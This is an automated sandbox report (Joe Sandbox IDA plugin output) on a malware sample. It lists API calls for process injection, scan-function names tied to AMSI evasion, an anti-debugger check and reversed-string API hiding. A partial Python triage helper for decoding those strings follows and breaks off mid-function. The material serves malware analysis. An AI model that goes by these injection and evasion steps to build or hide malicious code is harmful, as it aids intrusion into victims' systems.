                                          • Part of subcall function 02B48824: FreeLibrary.KERNEL32(74FA0000,00000000,02B91388,Function_000065D8,00000004,02B91398,02B91388,05F5E0FF,00000040,02B9139C,74FA0000,00000000,00000000,00000000,00000000,02B4890B), ref: 02B488EB
                                        • GetModuleHandleW.KERNEL32(ntdll,NtOpenProcess,UacScan,02B9137C,02B4CE00,ScanString,02B9137C,02B4CE00,ScanBuffer,02B9137C,02B4CE00,ScanString,02B9137C,02B4CE00,UacScan,02B9137C), ref: 02B4B22A
                                          • Part of subcall function 02B480C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B48150,?,?,00000000,00000000,?,02B48069,00000000,KernelBASE,00000000,00000000,02B48090), ref: 02B48115
                                          • Part of subcall function 02B480C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B4811B
                                          • Part of subcall function 02B480C8: GetProcAddress.KERNEL32(?,?), ref: 02B4812D
                                        • NtOpenProcess.NTDLL(02B91580,001F0FFF,02B91318,02B91330), ref: 02B4B328
                                          • Part of subcall function 02B32EE0: QueryPerformanceCounter.KERNEL32 ref: 02B32EE4
                                          • Part of subcall function 02B479B4: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02B47A27
                                        • IsBadReadPtr.KERNEL32(21DC0000,00000040), ref: 02B4B79F
                                        • IsBadReadPtr.KERNEL32(?,000000F8), ref: 02B4B7CC
                                          • Part of subcall function 02B47D00: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B47D74
                                        • GetModuleHandleW.KERNEL32(ntdll,NtCreateThreadEx,UacScan,02B9137C,02B4CE00,ScanString,02B9137C,02B4CE00,068D0000,068D0000,22230000,29BEE5B4,02B91584,OpenSession,02B9137C,02B4CE00), ref: 02B4C647
                                        • NtCreateThreadEx.NTDLL(02B9155C,02000000,02B91318,068D1656,068D1656,00000000,00000000,00000000,00000000,00000000,00000000,ScanBuffer,02B9137C,02B4CE00,UacInitialize,02B9137C), ref: 02B4C858
                                          • Part of subcall function 02B487A0: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02B913A4,02B4A3C7,ScanString,02B913A4,02B4A77C,ScanBuffer,02B913A4,02B4A77C,Initialize,02B913A4,02B4A77C,UacScan), ref: 02B487B4
                                          • Part of subcall function 02B487A0: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02B487CE
                                          • Part of subcall function 02B487A0: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02B913A4,02B4A3C7,ScanString,02B913A4,02B4A77C,ScanBuffer,02B913A4,02B4A77C,Initialize), ref: 02B4880A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: Library$AddressHandleModuleProc$FreeLoadMemoryReadVirtual$AllocateCounterCreateOpenPerformanceProcessQueryThreadWrite
                                        • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtCreateThreadEx$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$ntdll
                                        • API String ID: 2727761209-1870492900
                                        • Opcode ID: edd9bacdf53b1376cd521f211d65f187f733342ecaa4cea517056825c64a8c91
                                        • Instruction ID: 6d31c710e2b78f5550263809feead1b8bfc67b54c0dbeefaed072733a41c9789
                                        • Opcode Fuzzy Hash: edd9bacdf53b1376cd521f211d65f187f733342ecaa4cea517056825c64a8c91
                                        • Instruction Fuzzy Hash: E9F22A71A911299FDB52EBA4CCC0BDEB7BAEF85710F1045E2A009AB214DF30AE459F51

                                        Control-flow Graph (function starting at 02B35A78; graph rendering not reproduced)
                                        APIs
                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000105,02B30000,02B5D790), ref: 02B35A94
                                        • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02B30000,02B5D790), ref: 02B35AB2
                                        • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02B30000,02B5D790), ref: 02B35AD0
                                        • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02B35AEE
                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02B35B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02B35B37
                                        • RegQueryValueExA.ADVAPI32(?,02B35CE4,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02B35B7D,?,80000001), ref: 02B35B55
                                        • RegCloseKey.ADVAPI32(?,02B35B84,00000000,?,?,00000000,02B35B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02B35B77
                                        • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02B35B94
                                        • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02B35BA1
                                        • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02B35BA7
                                        • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02B35BD2
                                        • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02B35C19
                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02B35C29
                                        • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02B35C51
                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02B35C61
                                        • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02B35C87
                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02B35C97
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                        • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                        • API String ID: 1759228003-2375825460
                                        • Opcode ID: 6bd88369c95bb04b779ba6a7e0225f435b890315ee24a471a2168cc642ee5ca0
                                        • Instruction ID: edc7d93ce5ce97e03d4a1a12a40ba1a1e9aff970d7ab0d2b778ba26a13816916
                                        • Opcode Fuzzy Hash: 6bd88369c95bb04b779ba6a7e0225f435b890315ee24a471a2168cc642ee5ca0
                                        • Instruction Fuzzy Hash: 16517771A5025C7EFB32DAA8CC46FEF77BDDB08744F8001E1AA44E6181E7749A448F64

                                        Control-flow Graph (function starting at 02B487A0; graph rendering not reproduced)
                                        APIs
                                        • LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02B913A4,02B4A3C7,ScanString,02B913A4,02B4A77C,ScanBuffer,02B913A4,02B4A77C,Initialize,02B913A4,02B4A77C,UacScan), ref: 02B487B4
                                        • GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02B487CE
                                        • FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02B913A4,02B4A3C7,ScanString,02B913A4,02B4A77C,ScanBuffer,02B913A4,02B4A77C,Initialize), ref: 02B4880A
                                          • Part of subcall function 02B47D00: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B47D74
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
                                        • String ID: BCryptVerifySignature$bcrypt
                                        • API String ID: 1002360270-4067648912
                                        • Opcode ID: b7c23c57cab4b25500fd23b53cb5e1f8542b300244c8cd03142c2f149a524342
                                        • Instruction ID: 638068c6e0556497d71af471396e966f1cfc3433c076b32ccd98132fdce775af
                                        • Opcode Fuzzy Hash: b7c23c57cab4b25500fd23b53cb5e1f8542b300244c8cd03142c2f149a524342
                                        • Instruction Fuzzy Hash: 05F0A471A98215FEEB119F6CAE84BB633BCD3413D8F0089B9F10C87542CB701810AB50

                                        Control-flow Graph (basic blocks and successor edges recovered from the rendered graph)
                                        • 2b4ebf0-2b4ec0a GetModuleHandleW → 2b4ec36, 2b4ec0c
                                        • 2b4ec0c-2b4ec1e GetProcAddress → 2b4ec36, 2b4ec20
                                        • 2b4ec20-2b4ec30 CheckRemoteDebuggerPresent → 2b4ec36, 2b4ec32
                                        • 2b4ec32 → 2b4ec36
                                        • 2b4ec36-2b4ec3e → (none)
                                        APIs
                                        • GetModuleHandleW.KERNEL32(KernelBase), ref: 02B4EC00
                                        • GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02B4EC12
                                        • CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02B4EC29
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: AddressCheckDebuggerHandleModulePresentProcRemote
                                        • String ID: CheckRemoteDebuggerPresent$KernelBase
                                        • API String ID: 35162468-539270669
                                        • Opcode ID: cc80d66fd51031ace7c9ea02eaa4e9b621c84541d5fa0198c0d34fa2ce2dcc26
                                        • Instruction ID: b472b7859e94dc89618a6e509139a50a6e33c28d85a66a786ca582bdbbb1a686
                                        • Opcode Fuzzy Hash: cc80d66fd51031ace7c9ea02eaa4e9b621c84541d5fa0198c0d34fa2ce2dcc26
                                        • Instruction Fuzzy Hash: 8DF0A77090425CBAD722A7A888C97DCFBA9AB05328F6407D4E424611D2EB754744D655

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 02B34ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02B34EDA
                                        • RtlDosPa.N(00000000,?,00000000,00000000,00000000,02B4DC80), ref: 02B4DBEB
                                        • NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02B4DC80), ref: 02B4DC1B
                                        • NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02B4DC30
                                        • NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02B4DC5C
                                        • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02B4DC65
                                          • Part of subcall function 02B34C0C: SysFreeString.OLEAUT32(02B4E950), ref: 02B34C1A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: File$String$AllocCloseFreeInformationOpenQueryRead
                                        • String ID:
                                        • API String ID: 2659941336-0
                                        • Opcode ID: 205ea4fa91b8a6e834b2d18da851f8334ad9b89e34391b407fee3dac0009d7f7
                                        • Instruction ID: 977887595c801202f1389313691c2f364f27f2e260123c78f4a9fe709243bdee
                                        • Opcode Fuzzy Hash: 205ea4fa91b8a6e834b2d18da851f8334ad9b89e34391b407fee3dac0009d7f7
                                        • Instruction Fuzzy Hash: E121C4717507097AEB11EAD4CC86FEE77BDAB48700F5005A1B700F71C1DAB4AA049BA5

                                        Control-flow Graph

                                        APIs
                                        • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02B4E436
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: CheckConnectionInternet
                                        • String ID: Initialize$OpenSession$ScanBuffer
                                        • API String ID: 3847983778-3852638603
                                        • Opcode ID: 41698b1cacd432be45af3a8186df5465a71bff1a8d06aca8e4f36d4f0df719c9
                                        • Instruction ID: 636eb7891354e0d882f84798812e3bb858f804c110970478a58dae2ccf2e6e38
                                        • Opcode Fuzzy Hash: 41698b1cacd432be45af3a8186df5465a71bff1a8d06aca8e4f36d4f0df719c9
                                        • Instruction Fuzzy Hash: BD410D71B501089FEB12EBA4DC81A9EB3FAFF8C320F6148A5E141A7250DE74ED059F60

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 02B34ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02B34EDA
                                        • RtlDosPa.N(00000000,?,00000000,00000000,00000000,02B4DB9E), ref: 02B4DB0B
                                        • NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02B4DB45
                                        • NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02B4DB72
                                        • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02B4DB7B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: File$AllocCloseCreateStringWrite
                                        • String ID:
                                        • API String ID: 3308905243-0
                                        • Opcode ID: b5d1277f3d3355f5c540d38bdd5eb51317a7f8dedf4fee44b3a044b699e2e982
                                        • Instruction ID: 81e9a49b8cc6bcbb69fa53a50854b87da28ce70312606af91d2906a0837c2954
                                        • Opcode Fuzzy Hash: b5d1277f3d3355f5c540d38bdd5eb51317a7f8dedf4fee44b3a044b699e2e982
                                        • Instruction Fuzzy Hash: 7F21C171A40309BAEB11EBD4CD86FAEB7BDEB04B14F5045A1B700F71D0DBB46E049A55

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 02B48020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B48090,?,?,00000000,?,02B47A06,ntdll,00000000,00000000,02B47A4B,?,?,00000000), ref: 02B4805E
                                          • Part of subcall function 02B48020: GetModuleHandleA.KERNELBASE(?), ref: 02B48072
                                          • Part of subcall function 02B480C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B48150,?,?,00000000,00000000,?,02B48069,00000000,KernelBASE,00000000,00000000,02B48090), ref: 02B48115
                                          • Part of subcall function 02B480C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B4811B
                                          • Part of subcall function 02B480C8: GetProcAddress.KERNEL32(?,?), ref: 02B4812D
                                        • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02B47A27
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                        • String ID: ntdll$yromeMlautriVetacollAwZ
                                        • API String ID: 4072585319-445027087
                                        • Opcode ID: 7963bc3f6a98d59d20d304b6240f33139acbbcc72ac95ef946b572a5452a5883
                                        • Instruction ID: 3ae5b2c5e2d002a4026ca68d77e6b179fd42736c1b54d92aef4ecbad3f5ed972
                                        • Opcode Fuzzy Hash: 7963bc3f6a98d59d20d304b6240f33139acbbcc72ac95ef946b572a5452a5883
                                        • Instruction Fuzzy Hash: 58111E75654209BFEB01EFA8DD81E9EB7BDEB48710F5188A1F504D7640DE30AA14EB60

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 02B48020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B48090,?,?,00000000,?,02B47A06,ntdll,00000000,00000000,02B47A4B,?,?,00000000), ref: 02B4805E
                                          • Part of subcall function 02B48020: GetModuleHandleA.KERNELBASE(?), ref: 02B48072
                                          • Part of subcall function 02B480C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B48150,?,?,00000000,00000000,?,02B48069,00000000,KernelBASE,00000000,00000000,02B48090), ref: 02B48115
                                          • Part of subcall function 02B480C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B4811B
                                          • Part of subcall function 02B480C8: GetProcAddress.KERNEL32(?,?), ref: 02B4812D
                                        • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02B47A27
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                        • String ID: ntdll$yromeMlautriVetacollAwZ
                                        • API String ID: 4072585319-445027087
                                        • Opcode ID: aaadeeee9ebcb95f3d11f631f0172cdae44b4bf63099580c797cd3b16551dcd7
                                        • Instruction ID: 8c1a1b9e7b3b29d52b05e5e9e1a2b06d1e296b958fe6254bd747ade5458ec7b9
                                        • Opcode Fuzzy Hash: aaadeeee9ebcb95f3d11f631f0172cdae44b4bf63099580c797cd3b16551dcd7
                                        • Instruction Fuzzy Hash: A3111B75654209BFEB01EFA8DD81E9EB7BDEB48710F5188A1F504E7640DE30AA14EB60
                                        APIs
                                          • Part of subcall function 02B48020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B48090,?,?,00000000,?,02B47A06,ntdll,00000000,00000000,02B47A4B,?,?,00000000), ref: 02B4805E
                                          • Part of subcall function 02B48020: GetModuleHandleA.KERNELBASE(?), ref: 02B48072
                                          • Part of subcall function 02B480C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B48150,?,?,00000000,00000000,?,02B48069,00000000,KernelBASE,00000000,00000000,02B48090), ref: 02B48115
                                          • Part of subcall function 02B480C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B4811B
                                          • Part of subcall function 02B480C8: GetProcAddress.KERNEL32(?,?), ref: 02B4812D
                                        • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B47D74
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: HandleModule$AddressProc$MemoryVirtualWrite
                                        • String ID: Ntdll$yromeMlautriVetirW
                                        • API String ID: 2719805696-3542721025
                                        • Opcode ID: e01b1934b67778ccbaa1dfeeca6dccbc7e219880d5bbaaf23c7771294c562dcd
                                        • Instruction ID: a86325f77879c37943a4cd153c5682aae5e92076ecae73c49117419eab047047
                                        • Opcode Fuzzy Hash: e01b1934b67778ccbaa1dfeeca6dccbc7e219880d5bbaaf23c7771294c562dcd
                                        • Instruction Fuzzy Hash: 890144B5614205BFEB01EFA8DC81E9EB7FDEB48710F518890F504D7640DE30A910EB64
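The three functions above resolve their ntdll imports from reversed strings (the String IDs ntdll$yromeMlautriVetacollAwZ and Ntdll$yromeMlautriVetirW read ZwAllocateVirtualMemory and WriteVirtualMemory backwards), which keeps the API names out of a plain strings scan. The following triage helper is an added example written for this page, not part of the Joe Sandbox report or the sample: it takes String ID values in the report's module$string form, reverses each token and matches it against a constructed subset of ntdll exports. The second string reverses to WriteVirtualMemory without an Nt/Zw prefix while the function calls NtWriteVirtualMemory, so the helper also reports exports that match once their Nt/Zw prefix is stripped; treating the prefix as something the loader adds at runtime is an assumption, not something the report states.

```python
"""Recover API names that a loader stores reversed in memory.

Added example for triage of Joe Sandbox 'String ID' fields; not code from the
report or the analysed sample. NTDLL_EXPORTS is a constructed subset, not the
full export table of ntdll.dll.
"""
from __future__ import annotations

# Constructed subset of ntdll exports. A real run would load the export
# table from the DLL (e.g. with pefile) or a known-good export list.
NTDLL_EXPORTS = {
    "NtAllocateVirtualMemory", "ZwAllocateVirtualMemory",
    "NtWriteVirtualMemory", "ZwWriteVirtualMemory",
    "NtProtectVirtualMemory", "ZwProtectVirtualMemory",
    "NtCreateThreadEx", "ZwCreateThreadEx",
    "RtlInitUnicodeString", "NtDeleteFile",
}

EXPORTS_BY_MODULE = {"ntdll": NTDLL_EXPORTS}


def parse_string_id(string_id: str) -> tuple[str | None, list[str]]:
    """Split a 'String ID' such as 'ntdll$yromeM...' on '$'.

    Returns the first token that names a known module (case-insensitive,
    as the report shows both 'ntdll' and 'Ntdll') and the remaining tokens.
    """
    tokens = [t for t in string_id.split("$") if t]
    module: str | None = None
    rest: list[str] = []
    for tok in tokens:
        if module is None and tok.lower() in EXPORTS_BY_MODULE:
            module = tok.lower()
        else:
            rest.append(tok)
    return module, rest


def candidates(token: str, exports: set[str]) -> tuple[str, list[str]]:
    """Reverse one token and match it against the module's exports.

    'exact'           - the reversed text is itself an export
    'prefix-stripped' - it equals an export minus its Nt/Zw prefix
                        (assumption: the loader prepends the prefix at runtime)
    'none'            - no export matches
    """
    name = token[::-1]
    if name in exports:
        return "exact", [name]
    hits = sorted(e for e in exports if e[:2] in ("Nt", "Zw") and e[2:] == name)
    if hits:
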